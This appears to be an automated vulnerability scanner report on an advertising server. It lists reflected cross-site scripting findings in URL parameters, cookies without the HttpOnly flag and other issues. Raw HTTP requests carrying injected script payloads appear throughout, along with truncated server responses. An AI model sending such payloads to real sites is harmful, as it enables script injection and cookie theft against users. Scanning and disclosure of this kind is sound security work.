1. Cross-site scripting (reflected)
1.1. http://adserver.adtechus.com/adiframe/3.0/5235/1131606/0/154/ADTECH [REST URL parameter 1]
1.2. http://adserver.adtechus.com/adiframe/3.0/5235/1131606/0/154/ADTECH [REST URL parameter 2]
1.3. http://adserver.adtechus.com/adiframe/3.0/5235/1131606/0/154/ADTECH [REST URL parameter 3]
1.4. http://adserver.adtechus.com/adiframe/3.0/5235/1131606/0/154/ADTECH [REST URL parameter 4]
1.5. http://adserver.adtechus.com/adiframe/3.0/5235/1131606/0/154/ADTECH [REST URL parameter 5]
1.6. http://adserver.adtechus.com/adiframe/3.0/5235/1131606/0/154/ADTECH [REST URL parameter 6]
1.7. http://adserver.adtechus.com/adiframe/3.0/5235/1131606/0/154/ADTECH [REST URL parameter 7]
1.8. http://adserver.adtechus.com/adiframe/3.0/5235/1131606/0/154/ADTECH [cookie parameter]
3. Cookie without HttpOnly flag set
3.1. http://adserver.adtechus.com/addyn/3.0/5235/1131607/0/0/ADTECH
3.2. http://adserver.adtechus.com/addyn/3.0/5235/1131609/0/0/ADTECH
3.3. http://adserver.adtechus.com/addyn/3.0/5235/1131611/0/0/ADTECH
3.4. http://adserver.adtechus.com/adlink/3.0/5235/1131607/0/0/ADTECH
5. HTML does not specify charset
Severity: | High |
Confidence: | Certain |
Host: | http://adserver.adtechus |
Path: | /adiframe/3.0/5235 |
GET /adiframef37f6"><script>alert(1)< Host: adserver.adtechus.com Proxy-Connection: keep-alive Referer: http://drudgereport.com/ Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: JEB2=4D30B9576E651A4 |
HTTP/1.0 200 OK Connection: close Content-Type: text/html Content-Length: 293 <html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://adserver ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://adserver.adtechus |
Path: | /adiframe/3.0/5235 |
GET /adiframe/3.089cf1"><script>alert(1)< Host: adserver.adtechus.com Proxy-Connection: keep-alive Referer: http://drudgereport.com/ Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: JEB2=4D30B9576E651A4 |
HTTP/1.0 200 OK Connection: close Content-Type: text/html Content-Length: 293 <html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://adserver ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://adserver.adtechus |
Path: | /adiframe/3.0/5235 |
GET /adiframe/3.0/523528ec2"><script>alert(1)< Host: adserver.adtechus.com Proxy-Connection: keep-alive Referer: http://drudgereport.com/ Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: JEB2=4D30B9576E651A4 |
HTTP/1.0 200 OK Connection: close Content-Type: text/html Content-Length: 294 <html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://adserver ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://adserver.adtechus |
Path: | /adiframe/3.0/5235 |
GET /adiframe/3.0/5235 Host: adserver.adtechus.com Proxy-Connection: keep-alive Referer: http://drudgereport.com/ Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: JEB2=4D30B9576E651A4 |
HTTP/1.0 200 OK Connection: close Content-Type: text/html Content-Length: 294 <html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://adserver ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://adserver.adtechus |
Path: | /adiframe/3.0/5235 |
GET /adiframe/3.0/5235 Host: adserver.adtechus.com Proxy-Connection: keep-alive Referer: http://drudgereport.com/ Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: JEB2=4D30B9576E651A4 |
HTTP/1.0 200 OK Connection: close Content-Type: text/html Content-Length: 294 <html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://adserver ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://adserver.adtechus |
Path: | /adiframe/3.0/5235 |
GET /adiframe/3.0/5235 Host: adserver.adtechus.com Proxy-Connection: keep-alive Referer: http://drudgereport.com/ Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: JEB2=4D30B9576E651A4 |
HTTP/1.0 200 OK Connection: close Content-Type: text/html Content-Length: 294 <html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://adserver ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://adserver.adtechus |
Path: | /adiframe/3.0/5235 |
GET /adiframe/3.0/5235 Host: adserver.adtechus.com Proxy-Connection: keep-alive Referer: http://drudgereport.com/ Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: JEB2=4D30B9576E651A4 |
HTTP/1.0 200 OK Connection: close Content-Type: text/html Content-Length: 294 <html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://adserver ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://adserver.adtechus |
Path: | /adiframe/3.0/5235 |
GET /adiframe/3.0/5235 Host: adserver.adtechus.com Proxy-Connection: keep-alive Referer: http://drudgereport.com/ Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: JEB2=4D30B9576E651A4 |
HTTP/1.0 200 OK Connection: close Content-Type: text/html Content-Length: 294 <html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://adserver ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://adserver.adtechus |
Path: | /adiframe/3.0/5235 |
GET /adiframe/3.0/5235 Host: adserver.adtechus.com Proxy-Connection: keep-alive Referer: http://drudgereport.com/ Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: JEB2=4D30B9576E651A4 |
HTTP/1.0 200 OK Connection: close Content-Type: text/html Content-Length: 297 <html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://adserver ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://adserver.adtechus |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: adserver.adtechus.com |
HTTP/1.0 200 OK Connection: close Cache-Control: no-cache Content-Type: text/xml Content-Length: 111 <?xml version="1.0" ?><cross-domain-policy> |
Severity: | Information |
Confidence: | Certain |
Host: | http://adserver.adtechus |
Path: | /addyn/3.0/5235/1131607/0 |
GET /addyn/3.0/5235/1131607/0 Host: adserver.adtechus.com Proxy-Connection: keep-alive Referer: http://drudgereport.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: JEB2=4D30B9576E651A4 |
HTTP/1.0 200 OK Connection: close Server: Adtech Adserver Cache-Control: no-cache P3P: CP="NOI DSP DEVa OUR BUS UNI COM NAV INT" Content-Type: application/x-javascript Set-Cookie: 1=ADC72FAB.13D094.1 Content-Length: 1200 document.write("\n"); document.write('<SCR'+ ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://adserver.adtechus |
Path: | /addyn/3.0/5235/1131609/0 |
GET /addyn/3.0/5235/1131609/0 Host: adserver.adtechus.com Proxy-Connection: keep-alive Referer: http://drudgereport.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: JEB2=4D30B9576E651A4 |
HTTP/1.0 200 OK Connection: close Server: Adtech Adserver Cache-Control: no-cache P3P: CP="NOI DSP DEVa OUR BUS UNI COM NAV INT" Content-Type: application/x-javascript Set-Cookie: 1=ADC72FAB.153504.1 Content-Length: 1884 __ADTECH_CODE__ = ""; __theDocument = document; __theWindow = window; __bCodeFlushed = false; function __flushCode() { if (!__bCodeFlushed) { var span = parent.document ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://adserver.adtechus |
Path: | /addyn/3.0/5235/1131611/0 |
GET /addyn/3.0/5235/1131611/0 Host: adserver.adtechus.com Proxy-Connection: keep-alive Referer: http://drudgereport.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: JEB2=4D30B9576E651A4 |
HTTP/1.0 200 OK Connection: close Server: Adtech Adserver Cache-Control: no-cache P3P: CP="NOI DSP DEVa OUR BUS UNI COM NAV INT" Content-Type: application/x-javascript Set-Cookie: 1=ADC72FAB.153503.1 Content-Length: 1884 __ADTECH_CODE__ = ""; __theDocument = document; __theWindow = window; __bCodeFlushed = false; function __flushCode() { if (!__bCodeFlushed) { var span = parent.document ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://adserver.adtechus |
Path: | /adlink/3.0/5235/1131607 |
GET /adlink/3.0/5235/1131607 Host: adserver.adtechus.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: bk_lt_autogen=bk_lt |
HTTP/1.0 302 Moved Temporarily Connection: close Server: Adtech Adserver Cache-Control: no-cache P3P: CP="NOI DSP DEVa OUR BUS UNI COM NAV INT" Location: http:// Content-Length: 0 Set-Cookie: 1=ADC72FAB.13D094.1 |
Severity: | Information |
Confidence: | Certain |
Host: | http://adserver.adtechus |
Path: | /addyn/3.0/5235/1131607/0 |
GET /robots.txt HTTP/1.0 Host: adserver.adtechus.com |
HTTP/1.0 200 OK Connection: close Cache-Control: no-cache Content-Type: text/html Content-Length: 26 User-agent: * Disallow: / |
Severity: | Information |
Confidence: | Certain |
Host: | http://adserver.adtechus |
Path: | /adiframe/3.0/5235 |
GET /adiframe/3.0/5235 Host: adserver.adtechus.com Proxy-Connection: keep-alive Referer: http://drudgereport.com/ Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: JEB2=4D30B9576E651A4 |
HTTP/1.0 200 OK Connection: close Content-Type: text/html Content-Length: 251 <html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://adserver ...[SNIP]... |